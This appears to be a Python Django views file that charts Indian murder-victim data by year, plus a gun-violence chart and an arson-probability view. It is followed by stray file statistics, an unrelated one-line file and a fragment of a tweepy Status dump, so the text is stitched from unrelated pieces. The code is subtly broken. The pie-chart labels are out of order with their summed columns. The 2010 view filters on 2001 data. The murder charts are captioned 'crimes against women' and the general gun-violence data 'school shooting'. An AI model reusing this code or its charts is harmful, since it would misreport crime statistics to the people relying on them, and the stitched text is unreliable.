data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2005(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2005
data = data.fillna(0)
df = data[(data['Year'] == 2005)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2006(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2006
data = data.fillna(0)
df = data[(data['Year'] == 2006)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2007(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2007
data = data.fillna(0)
df = data[(data['Year'] == 2007)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2008(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2008
data = data.fillna(0)
df = data[(data['Year'] == 2008)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2009(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2009
data = data.fillna(0)
df = data[(data['Year'] == 2009)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murdpie2010(request):
data = pd.read_csv('32_Murder_victim_age_sex.csv')
var1 = 2010
data = data.fillna(0)
df = data[(data['Year'] == 2001)]
top = [sum(df['Victims_Above_50_Yrs']),
sum(df['Victims_Upto_10_15_Yrs']),
sum(df['Victims_Upto_10_Yrs']),
sum(df['Victims_Upto_15_18_Yrs']),
sum(df['Victims_Upto_18_30_Yrs']),
sum(df['Victims_Upto_30_50_Yrs']),
]
value = ['Victims_Above_50_Yrs' , 'Victims_Upto_10_15_Yrs' , 'Victims_Upto_10_Yrs' , 'Victims_Upto_15_18_Yrs' , 'Victims_Between_30-50_Yrs' ,'Victims_Upto_18_30_Yrs']
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of the victims age distribution",
"subCaption": "Murder Victims",
"theme": "zune"
}
dataSource['data'] = []
for key in range(0,6):
data = {}
data['label'] = value[key]
data['value'] = float(top[key])
dataSource['data'].append(data)
# returning complete JavaScript and HTML code, wwohich is used to generate chart in the browsers.
pie3d = FusionCharts("pie3d", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'murder/murdpie.html', {'output' : pie3d.render(), 'var1':var1})
def murd2002(request):
dataSource = {}
var1 = 2002
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2002):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2002, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2003(request):
dataSource = {}
var1 = 2003
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2003):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2003, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2004(request):
dataSource = {}
var1 = 2004
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2004):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2004, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2005(request):
dataSource = {}
var1 = 2005
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2005):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2005, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2006(request):
dataSource = {}
var1 = 2006
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2006):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2006, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2007(request):
dataSource = {}
var1 = 2007
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2007):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2007, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2008(request):
dataSource = {}
var1 = 2008
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2008):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2008, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2009(request):
dataSource = {}
var1 = 2009
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2009):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2009, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2010(request):
dataSource = {}
var1 = 2010
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2010):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2010, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def murd2001(request):
dataSource = {}
var1 = 2001
dataSource['chart'] = {
"caption": "Click on each State for a gender Analysis",
"xAxisName": "Name of the State",
"yAxisName": "Number of Reported crimes against women",
"theme": "ocean",
"paletteColors" : "#0075c2",
"bgColor" : "#ffffff",
"borderAlpha": "20",
"canvasBorderAlpha": "0",
"usePlotGradientColor": "0",
"plotBorderAlpha": "10",
"showXAxisLine": "1",
"xAxisLineColor" : "#999999",
"showValues" : "0",
"divlineColor" : "#999999",
"divLineIsDashed" : "1",
"showAlternateHGridColor" : "0"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
# Iterate through the data in `Revenue` model and insert in to the `dataSource['data']` list.
for key in murder.objects.all().filter(Year = 2001):
data = {}
data['label'] = key.Area_Name
data['value'] = key.Victims_Total
data['link'] = 'newchart-json-'+ key.Area_Name
dataSource['data'].append(data)
# Create the linkData for cities drilldown
linkData = {}
# Inititate the linkData for cities drilldown
linkData['id'] = key.Area_Name
linkedchart = {}
linkedchart['chart'] = {
"caption" : "Analysis of the Muders with respect to gender in - " + key.Area_Name ,
"showValues": "0",
"theme": "zune"
}
# Convert the data in the `City` model into a format that can be consumed by FusionCharts.
linkedchart['data'] = []
# Filtering the data base on the Country Code
for key in murder.objects.all().filter(Year = 2001, Area_Name=key.Area_Name):
arrDara = {}
arrDara['label'] = key.Group_Name
arrDara['value'] = key.Victims_Total
linkedchart['data'].append(arrDara)
linkData['linkedchart'] = linkedchart
dataSource['linkeddata'].append(linkData)
# Create an object for the Column 2D chart using the FusionCharts class constructor
column2D = FusionCharts("column2D", "ex1" , "1200", "600", "chart-1", "json", dataSource)
return render(request, 'murder/murdpie.html', {'output': column2D.render(), 'var1':var1})
def shooting(request):
template = loader.get_template('shoot_killed.html')
return HttpResponse(template.render())
def shot_kil(request):
module_dir = os.path.dirname(__file__)
file_path = os.path.join(module_dir, 'gun-violence-data_01-2013_03-2018.tar.gz')
d = pd.read_csv(file_path)
states = list(d['state'].unique())
killed=[]
for i in states:
s = d[(d['state']== i)]
k = sum(s['n_killed'])
killed.append(k)
dataSource = {}
dataSource['chart'] = {
"caption": "Analysis of Number of deaths in school shooting",
"subCaption": "Click on the states for city/county wise analysis",
"theme": "ocean"
}
dataSource['data'] = []
dataSource['linkeddata'] = []
for key in range(0,len(states)):
data = {}
data['label'] = states[key]
data['value'] = float(killed[key])
dataSource['data'].append(data)
pie3d = FusionCharts("column2D", "ex2" , "100%", "500", "chart-1", "json",dataSource)
return render(request, 'shoot/kild.html', {'output' : pie3d.render()})
def injkill(request):
template = loader.get_template('injvkill.html')
return HttpResponse(template.render())
def shot_inj(request):
template = loader.get_template('shot_inj.html')
return HttpResponse(template.render())
def fatal(request):
template = loader.get_template('fatal.html')
return HttpResponse(template.render())
def death(request):
template = loader.get_template('death.html')
return HttpResponse(template.render())
def inj(request):
template = loader.get_template('inj.html')
return HttpResponse(template.render())
def diainj(request):
template = loader.get_template('deainj.html')
return HttpResponse(template.render())
def deaandinj(request):
template = loader.get_template('deaandinj.html')
return HttpResponse(template.render())
def sanfrancisco(request):
filename = 'prediction.sav'
module_dir = os.path.dirname(__file__)
file_path = os.path.join(module_dir, filename)
model = pickle.load(open(file_path, 'rb'))
p = [0] * 17
day = 'Sunday'
place = 'BAYVIEW'
if day == 'Friday':
p[0]= 1
if day == 'Monday':
p[1]= 1
if day == 'Saturday':
p[2]= 1
if day == 'Sunday':
p[3]= 1
if day == 'Thursday':
p[4]= 1
if day == 'Tuesday':
p[5]= 1
if day == 'Wednesday':
p[6]= 1
if place == 'BAYVIEW':
p[7] = 1
if place == 'CENTRAL':
p[8] = 1
if place == 'INGLESIDE':
p[9] = 1
if place == 'MISSION':
p[10] = 1
if place == 'NORTHERN':
p[11] = 1
if place == 'PARK':
p[12] = 1
if place == 'RICHMOND':
p[13] = 1
if place == 'SOUTHERN':
p[14] = 1
if place == 'TARAVAL':
p[15] = 1
if place == 'TENDERLOIN':
p[16] = 1
array = model.predict_proba(p)
print ("Probability of Arson: ",(array[0][0])* 100, "%")
return HttpResponse(array[0][0]*100)
| 38.077391 | 174 | 0.575795 | 9,609 | 87,578 | 5.124883 | 0.055781 | 0.019494 | 0.029242 | 0.03046 | 0.904214 | 0.891136 | 0.880394 | 0.873469 | 0.871033 | 0.87022 | 0 | 0.050936 | 0.282879 | 87,578 | 2,299 | 175 | 38.093954 | 0.73317 | 0.128354 | 0 | 0.789357 | 0 | 0 | 0.2987 | 0.064338 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032705 | false | 0.002217 | 0.013858 | 0.000554 | 0.084257 | 0.000554 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
990e6cf2b744c4381d5dc90f24110c685791b506 | 24 | py | Python | bugtests/test080m.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test080m.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | bugtests/test080m.py | doom38/jython_v2.2.1 | 0803a0c953c294e6d14f9fc7d08edf6a3e630a15 | [
"CNRI-Jython"
] | null | null | null | def Spam(): return 'bar' | 24 | 24 | 0.666667 | 4 | 24 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 24 | 1 | 24 | 24 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0.12 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
99119a4f74fc47d1066504cbc1ca439b3c605f73 | 51,752 | py | Python | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | 3 tweets de resultado de busquedas trends globales.py | JacoGuerra/TwitterBot | 09a9ef1817d04acc5bbace23a4b2ba5d31813dec | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jul 13 01:52:29 2019
@author: Inki
"""
Status(_api = < tweepy.api.API object at 0x000001CE1B31E198 > , _json = {
'created_at': 'Fri Jul 12 22:13:55 +0000 2019',
'id': 1149804105717731330,
'id_str': '1149804105717731330',
